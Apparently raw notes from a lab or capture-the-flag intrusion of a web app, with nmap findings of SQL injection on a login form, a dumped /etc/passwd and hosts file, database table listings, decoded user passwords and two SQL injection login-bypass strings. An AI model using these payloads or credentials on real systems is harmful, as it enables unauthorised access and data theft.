<p>Tampa, FL 33601</p>
<br>
<p>Send Email to:</p>
<p>PublicAffairs@TargetCorp.com</p>

|   /login.php: Possible admin folder
|   /login.html: Possible admin folder

| http-sql-injection: 
|   Possible sqli for forms:
|     Form at path: /login.html, form's action: login.php. Fields that might be vulnerable:
|_      username

user/pass truth statement:
    welcome Aaron
    
    root:x:0:0:root:/root:/bin/bash 
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin 
    bin:x:2:2:bin:/bin:/usr/sbin/nologin 
    sys:x:3:3:sys:/dev:/usr/sbin/nologin 
    sync:x:4:65534:sync:/bin:/bin/sync 
    games:x:5:60:games:/usr/games:/usr/sbin/nologin 
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin 
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin 
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin 
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin 
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin 
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin 
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin 
    list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin 
    irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats 
    Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin 
    nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin 
    systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin 
    systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin 
    syslog:x:102:106::/home/syslog:/usr/sbin/nologin 
    messagebus:x:103:107::/nonexistent:/usr/sbin/nologin _apt:x:104:65534::/nonexistent:/usr/sbin/nologin 
    lxd:x:105:65534::/var/lib/lxd/:/bin/false uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin 
    dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin 
    sshd:x:109:65534::/run/sshd:/usr/sbin/nologin pollinate:x:110:1::/var/cache/pollinate:/bin/false 
    ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash mysql:x:111:115:MySQL Server,,,:/nonexistent:/bin/false 
    user2:x:1001:1001::/home/user2:/bin/sh 
    
    127.0.0.1 localhost # The following lines are desirable for IPv6 capable hosts 
    ::1 ip6-localhost ip6-loopback fe00::0 ip6-localnet ff00::0 ip6-mcastprefix ff02::1 ip6-allnodes ff02::2 ip6-allrouters 
    ff02::3 ip6-allhosts 192.168.28.181 WebApp 
    
    user2
    EaglesIsARE78
    
siteusers 	customer 	$id
siteusers 	customer 	$name
siteusers 	customer 	$account
siteusers 	customer 	$category
siteusers 	customer 	$description
siteusers 	net_products 	$id
siteusers 	net_products 	$quantity
siteusers 	net_products 	$product
siteusers 	net_products 	$price
siteusers 	purchase_history 	$id
siteusers 	purchase_history 	$quantity
siteusers 	purchase_history 	$product
siteusers 	purchase_history 	$account
siteusers 	shippingdates 	$id
siteusers 	shippingdates 	$ordernumber
siteusers 	shippingdates 	$account
siteusers 	shippingdates 	$date
siteusers 	users 	$user_id
siteusers 	users 	$name
siteusers 	users 	$username


1 	Aaron 	$Aaron
2 	user2 	$user2
3 	user3 	$user3
4 	Lroth 	$Lee_Roth
1 	ncnffjbeqlCn$$jbeq 	$Aaron
2 	RntyrfVfNER78 	$user2
3 	Obo4GURRnccyrf 	$user3
4 	anotherpassword4THEages 	$Lroth
    
    EaglesIsARE78 user2
    apasswordyPa$$word aaron
    Bob4THEEapples user3
    
    -192.168.28.172:22-<><>-OK PLEASE BE THE BOX

  179
  3389
  9999
  
  username=a' or '1 & passwd=a' or '1
  user='or1='1&pass='or1='1
  
  
  
